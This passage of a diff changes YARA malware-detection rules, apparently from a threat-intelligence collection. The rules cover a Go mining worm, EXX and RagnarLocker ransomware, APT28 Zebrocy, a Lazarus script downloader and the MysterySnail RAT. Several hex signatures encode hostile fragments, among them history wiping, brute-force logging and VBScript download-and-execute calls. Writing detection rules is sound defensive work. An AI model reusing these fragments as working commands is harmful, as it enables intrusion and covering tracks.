[2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 } - $s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 } - $s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d } - $s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff } + $x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 } + $x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 } + $x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 } + $op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 } + $op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 } + $op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 } + $op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 } condition: - uint16(0)==0x5A4D and filesize >300KB and all of ($s*) + uint16(0)==0x5a4d and filesize >350KB and (3 of ($op*) or 2 of ($x*)) } -rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE { meta: - description = "Detect the worm written in Go that drops XMRig Miner" + description = " Detected Lazarus EPS script for download and execute the payload in base 64" author = "Arkbird_SOLG" - id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2" - date = "2021-07-06" - modified = "2021-07-06" - reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22" + id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403" + date = "2020-07-28" + modified = "2020-07-28" + reference = "https://twitter.com/spider_girl22/status/1287952503280082944" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30" license_url = "N/A" - logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1" + logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552" score = 75 - quality = 61 + quality = 45 tags = "FILE" - hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe" - hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a" - tlp = "White" - adversary = "-" + hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7" strings: - $s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e } - $s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 } - $s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 } - $s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 } - $s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 } - $s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 } - $s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 } + $s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 } + $s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 } + $s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 } + $s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 } + $s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 } + $s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 } + $s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 } + $s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 } + $s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 } + $s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 } + $s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E } + $s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 } + $s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 } + $s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 } + $s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 } + $URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? } + $URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? } condition: - uint32(0)==0x464c457f and filesize >900KB and all of ($s*) + uint16(0)==0x33c9 and filesize <3KB and (1 of ($URL*)) and (12 of ($s*)) } -rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE { meta: - description = "Detect EXX variant ELF ransomware" + description = "Detect MysterySnaial RAT implant" author = "Arkbird_SOLG" - id = "fe85d480-317a-51c3-a817-fc9034e2944f" - date = "2020-12-09" - modified = "2020-12-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28" + id = "2fa5015a-144f-52f6-8a5f-28fce10861e3" + date = "2021-10-13" + modified = "2021-10-14" + reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25" license_url = "N/A" - logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085" + logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57" score = 50 - quality = 73 + quality = 75 tags = "FILE" + hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d" + hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e" + hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc" level = "experimental" - hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849" + tlp = "White" + adversary = "MysterySnail" strings: - $dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a } - $dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 } - $dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a } - $dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a } - $lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii - $lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii - $lib3 = "mbedtls_rsa_import" fullword ascii - $lib4 = "mbedtls_rsa_export" fullword ascii - $lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii - $lib6 = "mbedtls_sha256_process" fullword ascii - $seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb } - $seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff } - $seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 } + $s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 } + $s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f } + $s3 = { 25 2a 73 70 75 62 3a 0a } + $s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 } + $s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 } condition: - uint16(0)==0x457f and filesize >80KB and 3 of ($dbg*) and 4 of ($lib*) and 2 of ($seq*) + uint16(0)==0x5A4D and filesize >500KB and all of ($s*) } import "pe" -rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_Ran_Mem_Ragnarlocker_Nov_2020_1 : FILE { meta: - description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)" + description = "Detect memory artefacts of the Ragnarlocker ransomware (Nov 2020)" author = "Arkbird_SOLG" - id = "25452eaa-f135-5b7f-a523-67715a2ab9f7" - date = "2020-12-09" - modified = "2020-12-10" - reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35" + id = "910774ab-9ad6-5c56-a921-203f61c9d7f7" + date = "2020-11-26" + modified = "2020-11-27" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L3-L33" license_url = "N/A" - logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b" - score = 50 - quality = 69 + logic_hash = "2cb26677b8f4e464750eb8dec0638fd3f9a28500e68f64d62e99236c93895c85" + score = 75 + quality = 50 tags = "FILE" - level = "experimental" - hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30" + hash1 = "041fd213326dd5c10a16caf88ff076bb98c68c052284430fba5f601023d39a14" + hash2 = "dd79b2abc21e766fe3076038482ded43e5069a1af9e0ad29e06dce387bfae900" strings: - $c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b } - $c2 = { 52 90 4e 54 46 53 } - $c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 } - $c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 } - $c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 } - $c6 = { 46 49 4c 45 30 00 03 00 8? ?d } - $c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 } - $s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 } - $s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 } - $s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c } - $s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 } - $s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 } - $s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 } - $s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 } - $s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 } - $s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 } - $s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 } - $s11 = { 2f 2f 3a 70 74 74 68 } + $s1 = "\\\\.\\PHYSICALDRIVE%d" fullword wide + $s2 = "bootfont.bin" fullword wide + $s3 = "bootsect.bak" fullword wide + $s4 = "bootmgr.efi" fullword wide + $s5 = "---RAGNAR SECRET---" fullword ascii + $s6 = "Mozilla" + $s7 = "Internet Explorer" fullword wide + $s8 = " </trustInfo>" fullword ascii + $s9 = "Tor browser" fullword wide + $s10 = "Opera Software" fullword wide + $s11 = "---END RAGN KEY---" fullword ascii + $s12 = "---BEGIN RAGN KEY---" fullword ascii + $s13 = "%s-%s-%s-%s-%s" fullword wide + $s14 = "$Recycle.Bin" fullword wide + $s15 = "***********************************************************************************" fullword ascii + $s16 = "K<^_[]" fullword ascii + $s17 = "SD;SDw" fullword ascii + $s18 = "Windows.old" fullword wide + $s19 = "iconcache.db" fullword wide condition: - uint16(0)==0x33c0 and filesize >40KB and 5 of ($c*) and 8 of ($s*) + uint16(0)==0x5a4d and filesize >30KB and 12 of them } import "pe" -rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_Ran_Cert_Ragnarlocker_Nov_2020_1 : FILE { meta: - description = "Detect Zebrocy Go downloader (November 2020)" + description = "Detect certificates and VMProtect used for the Ragnarlocker ransomware (Nov 2020)" author = "Arkbird_SOLG" - id = "114c0297-7168-5d20-b56b-89b0b47f18c7" - date = "2020-12-09" - modified = "2020-12-10" - reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65" + id = "85d51804-eebd-5353-8bd9-01756e7f7d07" + date = "2020-11-26" + modified = "2020-11-27" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L35-L55" license_url = "N/A" - logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9" + logic_hash = "8171128426b48102457f5ba0771b27aaf5f4562293aff04c256bd5bd721a908e" score = 50 - quality = 61 + quality = 75 tags = "FILE" - level = "experimental" - hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19" - hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662" + level = "Experimental" + hash1 = "afab912c41c920c867f1b2ada34114b22dcc9c5f3666edbfc4e9936c29a17a68" + hash2 = "9416e5a57e6de00c685560fa9fee761126569d123f62060792bf2049ebba4151" strings: - $c1 = "os.(*ProcessState).sys" fullword ascii - $c2 = "os/exec.(*ExitError).Sys" fullword ascii - $c3 = "os/exec.ExitError.Sys" fullword ascii - $c4 = "os.(*ProcessState).Sys" fullword ascii - $p1 = "syscall.CreatePipe" fullword ascii - $p2 = "os.Pipe" fullword ascii - $p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 } - $p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 } - $op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b } - $op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 } - $op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 } - $op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 } - $op5 = { 